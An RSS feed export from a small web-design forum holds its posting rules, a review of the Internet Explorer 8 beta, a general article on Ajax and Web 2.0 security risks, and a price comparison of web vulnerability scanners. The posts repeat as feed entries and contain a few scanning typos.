https://www.webneticsuk.com/forum/ Thu, 09 Apr 2026 08:04:09 +0000 MyBB https://www.webneticsuk.com/forum/showthread.php?tid=202 Sun, 27 Mar 2011 12:30:58 +0000 webnetics]]> https://www.webneticsuk.com/forum/showthread.php?tid=202 Common rules

1. Only one account per person is permitted.
2. Do not pretend to be/represent somebody else. Your account will be deleted if found to be in breach of this rule.
3. When registering, a valid email address has to be used. Disposable email addresses are not permitted. If found, we will remove the account in question.
4. Keep all posts on-topic.
5. All posts must be in English, unless posted in a specific international forum. If posting in a international forum, please use the language of that forum, and not English.
6. DO NOT SEND SUPPORT REQUESTS VIA PM, unless expressly invited to do so. Using PM to actively solicit work is not allowed. Post, in accord with the rules in the correct forum. Abuse of the PM system in this way can lead to your membership being removed.
7. Do not discuss illegal activities.
8. No useless posts. This includes: Thread bumping, useless one liners, repeated requests about new versions, Flamewars, Trolling and Spamming.
9. Do not propose/link to any site that contains warez/copyrighted software/materials that can be downloaded illegally.
10. Do not link to any site that contains adult content, sexually oriented material or might otherwise be considered offensive. Any post containing an inappropriate link will be deleted and the poster will receive a warning.

At all times

1. Keep all commentary civil, and be courteous at all times. Constructive criticism is welcome, but insults directed towards other users or the site admins will not be tolerated. Coarse/insulting language will not be tolerated.
2. Choose an appropriate subject line. Try to summarise the problem briefly in the subject, and elaborate in the message itself. A title like "Have you seen this..." or "Help needed!!!!" will be deleted.
3. Spend 10 minutes with the admin panel before posting common sense questions like "How do I see orders", or "How do I add products". If you go through each admin menu you will find all you need to know about the basic features.
4. Search before posting. You may need to search multiple variation of the terms.
5. Any posts deemed to be self promotion, advertising, or spam can and will be removed. NO SPAM - NO ADVERTISING eg. Posting and making excessive, inappropriate and unnecessary references to your products and websites is self promotion.
6. Don't lump sum mods and inquiries in one post. People asking for help and at the same time attaching a contribution should be avoided. Contributions go in the contrib thread. Help goes in one of the support threads, based on the affected element (modules, templates, languages, general, etc).
7. Bugs go into the bug area ONLY after you have searched the bug forum and found nothing similar.
8. Hijacking threads because you feel the need to whine or complain about your personal opinions that have nothing to do with the main topic of the thread will be instantly deleted at will!
9. If you feel a post violates any of these rules, or you need to bring it to the attention of a moderator (move threads/close/split), please use the ‘report this post’ link to notify the moderators.

Signatures & Avatars

1. Must be setup in your Profile (user Control Panel) , and not manually added to your messages.
2. May not contain any pricing, sales, product etc. details.
3. Only exact URLs allowed ie not LOOK HERE - No tinyurls, affiliate links etc either, only exact, literal URLs
4. Maximum font size should not be larger than normal +1.
5. Signature shall not have more than 4 lines (at a line width of 75 chars).
6. Any signature or avatar that is offensive or insulting to either us, our members, or our staff, is prohibited.
7. Signature size should not exceed the maximum size of 60 x 180 px (height x width).
8. Avatar size should not exceed the maximum size of 75 x 75 px (height x width).
9. Signature & Avatar images may not contain any copyright material (e.g. trademarks)
10. We reserve the right to ask you to change and/or remove your signature or avatar at any time, for any reason.

Failure to abide by these rules may result in an editing, negative moderation or deletion of your post.
We reserve the right to ban users from the site.
We reserve the right to change these rules at any time.]]> Common rules

1. Only one account per person is permitted.
2. Do not pretend to be/represent somebody else. Your account will be deleted if found to be in breach of this rule.
3. When registering, a valid email address has to be used. Disposable email addresses are not permitted. If found, we will remove the account in question.
4. Keep all posts on-topic.
5. All posts must be in English, unless posted in a specific international forum. If posting in a international forum, please use the language of that forum, and not English.
6. DO NOT SEND SUPPORT REQUESTS VIA PM, unless expressly invited to do so. Using PM to actively solicit work is not allowed. Post, in accord with the rules in the correct forum. Abuse of the PM system in this way can lead to your membership being removed.
7. Do not discuss illegal activities.
8. No useless posts. This includes: Thread bumping, useless one liners, repeated requests about new versions, Flamewars, Trolling and Spamming.
9. Do not propose/link to any site that contains warez/copyrighted software/materials that can be downloaded illegally.
10. Do not link to any site that contains adult content, sexually oriented material or might otherwise be considered offensive. Any post containing an inappropriate link will be deleted and the poster will receive a warning.

At all times

1. Keep all commentary civil, and be courteous at all times. Constructive criticism is welcome, but insults directed towards other users or the site admins will not be tolerated. Coarse/insulting language will not be tolerated.
2. Choose an appropriate subject line. Try to summarise the problem briefly in the subject, and elaborate in the message itself. A title like "Have you seen this..." or "Help needed!!!!" will be deleted.
3. Spend 10 minutes with the admin panel before posting common sense questions like "How do I see orders", or "How do I add products". If you go through each admin menu you will find all you need to know about the basic features.
4. Search before posting. You may need to search multiple variation of the terms.
5. Any posts deemed to be self promotion, advertising, or spam can and will be removed. NO SPAM - NO ADVERTISING eg. Posting and making excessive, inappropriate and unnecessary references to your products and websites is self promotion.
6. Don't lump sum mods and inquiries in one post. People asking for help and at the same time attaching a contribution should be avoided. Contributions go in the contrib thread. Help goes in one of the support threads, based on the affected element (modules, templates, languages, general, etc).
7. Bugs go into the bug area ONLY after you have searched the bug forum and found nothing similar.
8. Hijacking threads because you feel the need to whine or complain about your personal opinions that have nothing to do with the main topic of the thread will be instantly deleted at will!
9. If you feel a post violates any of these rules, or you need to bring it to the attention of a moderator (move threads/close/split), please use the ‘report this post’ link to notify the moderators.

Signatures & Avatars

1. Must be setup in your Profile (user Control Panel) , and not manually added to your messages.
2. May not contain any pricing, sales, product etc. details.
3. Only exact URLs allowed ie not LOOK HERE - No tinyurls, affiliate links etc either, only exact, literal URLs
4. Maximum font size should not be larger than normal +1.
5. Signature shall not have more than 4 lines (at a line width of 75 chars).
6. Any signature or avatar that is offensive or insulting to either us, our members, or our staff, is prohibited.
7. Signature size should not exceed the maximum size of 60 x 180 px (height x width).
8. Avatar size should not exceed the maximum size of 75 x 75 px (height x width).
9. Signature & Avatar images may not contain any copyright material (e.g. trademarks)
10. We reserve the right to ask you to change and/or remove your signature or avatar at any time, for any reason.

Failure to abide by these rules may result in an editing, negative moderation or deletion of your post.
We reserve the right to ban users from the site.
We reserve the right to change these rules at any time.]]> https://www.webneticsuk.com/forum/showthread.php?tid=92 Sun, 01 Jun 2008 13:53:03 +0000 webnetics]]> https://www.webneticsuk.com/forum/showthread.php?tid=92
The changes Microsoft has implemented see the browser going standards crazy. In the past, this would have been good news, but coming from a world where the majority of people are using the distinctly quirky IE7, there's going to be a generous crossover period where developers just have another browser to check against.

However, IE8 sounds a lot smarter. Top new features outside of the fabled Standards mode include 'Web Slices' and 'Activities'. The former is a kind of syndicated feed widget and the latter is a form of live contextual menuing for web pages. Both need a little work before they impress me.

At first glance, the new Internet Explorer looks much the same as the previous version the interfaces are almost identical. But explore a little further and you'll spot a few changes. For example, wave goodbye to the Phishing Filter and say hello to the Safety Filter, which also protects you from sites that are known to host malware.

The Address bar features something called 'domain highlighting'. This displays the top-level domain name in a bold, black font while the rest of the URL appears in grey. Presumably, the idea is to help you figure out where you are if you've followed a link to some intentionally misleading URL. Sounds reasonable, although if you've clicked on a spam link and IE8's Safety Filter hasn't blocked the page then it may already be too late.

Elsewhere, the Manage Add-ons dialog has been revamped. There's no doubt it looks prettier, but we see no real improvements in functionality — perhaps they're being saved for a future beta.

Technical improvements include the ability to restrict ActiveX controls to one particular site, which is handy as it limits possible exploits by hackers. And the current Data Execution Prevention (DEP) option is enabled by default. This means code cannot be run in memory that's marked as non-executable, making it more difficult to attack the browser through a buffer overrun.

There are some small, incremental security gains in IE8 beta 1, then, but nothing dramatic; no killer feature that's likely to restore the faith of IE doubters. It's early days, though: the final version isn't likely to be out until the end of the year, so there's time for Microsoft to deliver.

A quick tour of the new browser

1 The IE8 right-dick menu now includes many Activities that you can apply to a page — perhaps automatically translating text or mapping an address.

2 WebSlices enables ,you to subscribe to content from within a web page: an eBay item, for instance. You can monitor any updates on your Favourites bar.

3 Improved reliability means it's far harder to make IE8 crash (no, really). And even if the worst happens, IE8 will restore your open Tabs within it restarts.

4 And let's not forget perhaps the biggest step forward of all: the much improved standards support that sees IE8 finally pass the Acid2 test. Well, almost.

The changes Microsoft has implemented see the browser going standards crazy. In the past, this would have been good news, but coming from a world where the majority of people are using the distinctly quirky IE7, there's going to be a generous crossover period where developers just have another browser to check against.

However, IE8 sounds a lot smarter. Top new features outside of the fabled Standards mode include 'Web Slices' and 'Activities'. The former is a kind of syndicated feed widget and the latter is a form of live contextual menuing for web pages. Both need a little work before they impress me.]]>
The changes Microsoft has implemented see the browser going standards crazy. In the past, this would have been good news, but coming from a world where the majority of people are using the distinctly quirky IE7, there's going to be a generous crossover period where developers just have another browser to check against.

However, IE8 sounds a lot smarter. Top new features outside of the fabled Standards mode include 'Web Slices' and 'Activities'. The former is a kind of syndicated feed widget and the latter is a form of live contextual menuing for web pages. Both need a little work before they impress me.

At first glance, the new Internet Explorer looks much the same as the previous version the interfaces are almost identical. But explore a little further and you'll spot a few changes. For example, wave goodbye to the Phishing Filter and say hello to the Safety Filter, which also protects you from sites that are known to host malware.

The Address bar features something called 'domain highlighting'. This displays the top-level domain name in a bold, black font while the rest of the URL appears in grey. Presumably, the idea is to help you figure out where you are if you've followed a link to some intentionally misleading URL. Sounds reasonable, although if you've clicked on a spam link and IE8's Safety Filter hasn't blocked the page then it may already be too late.

Elsewhere, the Manage Add-ons dialog has been revamped. There's no doubt it looks prettier, but we see no real improvements in functionality — perhaps they're being saved for a future beta.

Technical improvements include the ability to restrict ActiveX controls to one particular site, which is handy as it limits possible exploits by hackers. And the current Data Execution Prevention (DEP) option is enabled by default. This means code cannot be run in memory that's marked as non-executable, making it more difficult to attack the browser through a buffer overrun.

There are some small, incremental security gains in IE8 beta 1, then, but nothing dramatic; no killer feature that's likely to restore the faith of IE doubters. It's early days, though: the final version isn't likely to be out until the end of the year, so there's time for Microsoft to deliver.

A quick tour of the new browser

1 The IE8 right-dick menu now includes many Activities that you can apply to a page — perhaps automatically translating text or mapping an address.

2 WebSlices enables ,you to subscribe to content from within a web page: an eBay item, for instance. You can monitor any updates on your Favourites bar.

3 Improved reliability means it's far harder to make IE8 crash (no, really). And even if the worst happens, IE8 will restore your open Tabs within it restarts.

4 And let's not forget perhaps the biggest step forward of all: the much improved standards support that sees IE8 finally pass the Acid2 test. Well, almost.

The changes Microsoft has implemented see the browser going standards crazy. In the past, this would have been good news, but coming from a world where the majority of people are using the distinctly quirky IE7, there's going to be a generous crossover period where developers just have another browser to check against.

However, IE8 sounds a lot smarter. Top new features outside of the fabled Standards mode include 'Web Slices' and 'Activities'. The former is a kind of syndicated feed widget and the latter is a form of live contextual menuing for web pages. Both need a little work before they impress me.]]> https://www.webneticsuk.com/forum/showthread.php?tid=26 Wed, 09 Jan 2008 14:42:08 +0000 webnetics]]> https://www.webneticsuk.com/forum/showthread.php?tid=26
While such an increase in web traffic is a boon for the industry, it does have its downsides. Interactive sites use open source Ajax coding, which gives malware writers considerably more points of entry than traditional HTML coding. The problem is further exacerbated when web developers don't possess enough security knowledge to deal with new advances in the industry, and unwittingly leave sites — and the end-user — open to attack.

So what threats are web developers now facing? As mentioned, Ajax is a key cause of increased security breaches on the web. A traditional web application can be compared to a house with just one front door and no windows, in that it offers only one point of attack. On the other hand, an Ajax application constantly exchanges small amounts of data between the browser and the server, which creates many points of input. The inputs provide more opportunities for attack; as well as the front door, the house has numerous windows, all providing a break-and-entry point.

Of course, it's this open source technology that enables the interactive functions on a website to exist, and it would be ridiculous to suggest erasing such functions to retain a secure website. Instead, the security industry must share its knowledge with web developers so that precautions are taken to prevent Ajax-based sites being hijacked.

Targeting Web 2.0 sites

Web 2.0 technology has exploded so fast that it has been impossible for the IT industry to keep up. Right now, 71 per cent of UK office workers aged 28-29 access Web 2.0 internet sites at least a few times a week, and it's these sites that have gained the most popularity with phishers and hackers. In March 2007, for example, Google's Online Security blog noted that the number of page views generated on phishing sites increased fivefold, with 95 per cent targeting MySpace. Holes in security mean that sites such as MySpace have turned into goldmines: the injection of a simple CSS code into a profile is all it takes to infect the page, so that wherever a user clicks, even on what appears to be a Legitimate link, they're redirected to a phishing page.

Many users have the same login credentials for social networking accounts as they do for banks and web-based mail. This creates a domino effect and enables a user's online identity to be fully compromised. If web developers are unaware of how to prevent such security breaches, the web will grow increasingly unsafe and, as a result, the positive aspects of the Web 2.0 revolution will be seriously undermined.

One successful hacker — Lithium — has been quoted as saying: "Lazy web developers are the reason I'm still around phishing." However, the blame cannot be laid solely at the door of web developers. On the contrary, it's the training they receive that's a major part of the problem. It seems that the provision of security training varies from course to course, with some teaching very little on the subject at alit Web development courses should teach would-be developers that the key to ensuring consumer confidence in the web is to make a site as invulnerable as possible from its conception. To do this, developers should make sure that all input is sanitised and all points of input are as secure as possible. Up to date advice on security best practice, technical documentation and free, secure source code can be found at the Open Web Application Security Project (owasp.org).

Within the next year, it's likely that the IT community will see more incidents of Ajax-borne threats, which should hopefully be enough to developers' awareness of this issue.]]>
While such an increase in web traffic is a boon for the industry, it does have its downsides. Interactive sites use open source Ajax coding, which gives malware writers considerably more points of entry than traditional HTML coding. The problem is further exacerbated when web developers don't possess enough security knowledge to deal with new advances in the industry, and unwittingly leave sites — and the end-user — open to attack.

So what threats are web developers now facing? As mentioned, Ajax is a key cause of increased security breaches on the web. A traditional web application can be compared to a house with just one front door and no windows, in that it offers only one point of attack. On the other hand, an Ajax application constantly exchanges small amounts of data between the browser and the server, which creates many points of input. The inputs provide more opportunities for attack; as well as the front door, the house has numerous windows, all providing a break-and-entry point.

Of course, it's this open source technology that enables the interactive functions on a website to exist, and it would be ridiculous to suggest erasing such functions to retain a secure website. Instead, the security industry must share its knowledge with web developers so that precautions are taken to prevent Ajax-based sites being hijacked.

Targeting Web 2.0 sites

Web 2.0 technology has exploded so fast that it has been impossible for the IT industry to keep up. Right now, 71 per cent of UK office workers aged 28-29 access Web 2.0 internet sites at least a few times a week, and it's these sites that have gained the most popularity with phishers and hackers. In March 2007, for example, Google's Online Security blog noted that the number of page views generated on phishing sites increased fivefold, with 95 per cent targeting MySpace. Holes in security mean that sites such as MySpace have turned into goldmines: the injection of a simple CSS code into a profile is all it takes to infect the page, so that wherever a user clicks, even on what appears to be a Legitimate link, they're redirected to a phishing page.

Many users have the same login credentials for social networking accounts as they do for banks and web-based mail. This creates a domino effect and enables a user's online identity to be fully compromised. If web developers are unaware of how to prevent such security breaches, the web will grow increasingly unsafe and, as a result, the positive aspects of the Web 2.0 revolution will be seriously undermined.

One successful hacker — Lithium — has been quoted as saying: "Lazy web developers are the reason I'm still around phishing." However, the blame cannot be laid solely at the door of web developers. On the contrary, it's the training they receive that's a major part of the problem. It seems that the provision of security training varies from course to course, with some teaching very little on the subject at alit Web development courses should teach would-be developers that the key to ensuring consumer confidence in the web is to make a site as invulnerable as possible from its conception. To do this, developers should make sure that all input is sanitised and all points of input are as secure as possible. Up to date advice on security best practice, technical documentation and free, secure source code can be found at the Open Web Application Security Project (owasp.org).

Within the next year, it's likely that the IT community will see more incidents of Ajax-borne threats, which should hopefully be enough to developers' awareness of this issue.]]> https://www.webneticsuk.com/forum/showthread.php?tid=6 Mon, 26 Nov 2007 20:48:41 +0000 webnetics]]> https://www.webneticsuk.com/forum/showthread.php?tid=6
Perhaps the best answer is to find yourself a web vulnerability scanner. This is a program that will look at your site and its structure, analyse any applications and check for cross-site scripting, SQL injection and potential vulnerabilities. These tools can't offer a aro per cent guarantee, as they're looking for known security holes and exploits: your site may come up clean and still be vulnerable to a-new hacking technique that's discovered next week. This isn't likely, though, and at least in the meantime you can be sure that your set-up has been tested to a known standard.

These are powerful applications, but there's a price to pay for it. The Acunetix Web Vulnerability Scanner for instance, is an excellent tool that can analyse JavaScript, Flash content, Soap and Ajax, as well as run through some very in-depth cross-site scripting and SQL injection tests. It quickly indexes even the largest sites, and produces reports that clearly point out the problems, even if you're not a developer. But to buy a licence to check just one site will cost you about £750, and if you want to scan any site, the price leaps to £3,750.

Are these prices really worth paying? For large companies, yes. Tasking someone to manually audit a site once would cost more than £750. And if you're a consultant who offers security advice to companies, then the ability to include accurate vulnerability reports should help you earn more than enough new business to pay for the software.

However, there are cheaper alternatives. Gamasec offers marginally less detailed testing for a much lower price (from £100 per scan on a pay-as-you-go basis).

Online scanning services such as AlertSite can save you money, and include free trials. There's a free version of the Acunetix scanner that checks only for cross-site scripting problems, and there's the classic open source Nessus, which works best on Unix (www.nessus.orct).]]>
Perhaps the best answer is to find yourself a web vulnerability scanner. This is a program that will look at your site and its structure, analyse any applications and check for cross-site scripting, SQL injection and potential vulnerabilities. These tools can't offer a aro per cent guarantee, as they're looking for known security holes and exploits: your site may come up clean and still be vulnerable to a-new hacking technique that's discovered next week. This isn't likely, though, and at least in the meantime you can be sure that your set-up has been tested to a known standard.

These are powerful applications, but there's a price to pay for it. The Acunetix Web Vulnerability Scanner for instance, is an excellent tool that can analyse JavaScript, Flash content, Soap and Ajax, as well as run through some very in-depth cross-site scripting and SQL injection tests. It quickly indexes even the largest sites, and produces reports that clearly point out the problems, even if you're not a developer. But to buy a licence to check just one site will cost you about £750, and if you want to scan any site, the price leaps to £3,750.

Are these prices really worth paying? For large companies, yes. Tasking someone to manually audit a site once would cost more than £750. And if you're a consultant who offers security advice to companies, then the ability to include accurate vulnerability reports should help you earn more than enough new business to pay for the software.

However, there are cheaper alternatives. Gamasec offers marginally less detailed testing for a much lower price (from £100 per scan on a pay-as-you-go basis).

Online scanning services such as AlertSite can save you money, and include free trials. There's a free version of the Acunetix scanner that checks only for cross-site scripting problems, and there's the classic open source Nessus, which works best on Unix (www.nessus.orct).]]>